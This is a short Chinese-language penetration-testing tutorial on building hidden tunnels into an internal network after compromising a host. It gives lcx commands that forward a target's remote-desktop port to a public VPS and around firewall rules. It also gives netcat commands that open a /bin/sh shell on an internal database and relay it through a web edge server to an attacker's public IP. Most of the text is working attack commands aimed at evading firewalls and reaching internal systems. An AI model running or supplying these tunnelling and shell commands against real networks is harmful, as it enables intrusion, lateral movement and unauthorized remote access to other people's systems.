内网渗透--建立隐藏通信隧道
传输层隧道技术
传输层技术包括TCP 隧道、UDP 隧道、和常见的端口转发等。在渗透测试中,如果内网防火墙阻止了对指定端口的访问,在获得目标机器的权限后,可以使用IPTABLES打开指定端口。
1、lcx 端口转发
LCX是一个基于socket 套接字实现的端口转发工具。windows版本为lcx.exe,Linux 版本为 portmap。
1.1 内网端口转发
在目标机器上执行如下命令,将目标机器3389端口的所有数据转发到公网vps的4444 端口上
lcx.exe -slave 公网主机IP 4444 127.0.0.1 3389
在vps 上执行如下命令,将本机4444端口上监听的所有数据转发到本机的5555 端口上。
lcx.exe -listen 4444 5555
此时,我们使用 mstsc 连接 <公网IP地址>:5555,即可访问目标服务器的3389端口。
1.2 本地端口映射
如果目标主机的部分端口(如3389)被防火墙拦截时,我们可以通过目标主机相应端口的数据传到防火墙允许的其他端口(如53)。
在目标主机上执行如下命令,就可以直接从远程桌面连接到目标主机的53端口了。
lcx.exe -tran <目标主机IP地址> 3389
2、NC 代理转发
通过边界机作代理,使kali与数据库通信,访问内网数据库:
攻击机:192.136.100.111 (公网IP)
WEB边界机:192.168.1.100 10.10.10.100
内网数据库:10.10.10.200
攻击机执行:
nc -lvp 3333
数据库执行:
nc -lvp 3333 -e /bin/sh
web服务器执行:
nc -v 192.136.100.111 3333 -c "nc -v 10.10.10.200 3333"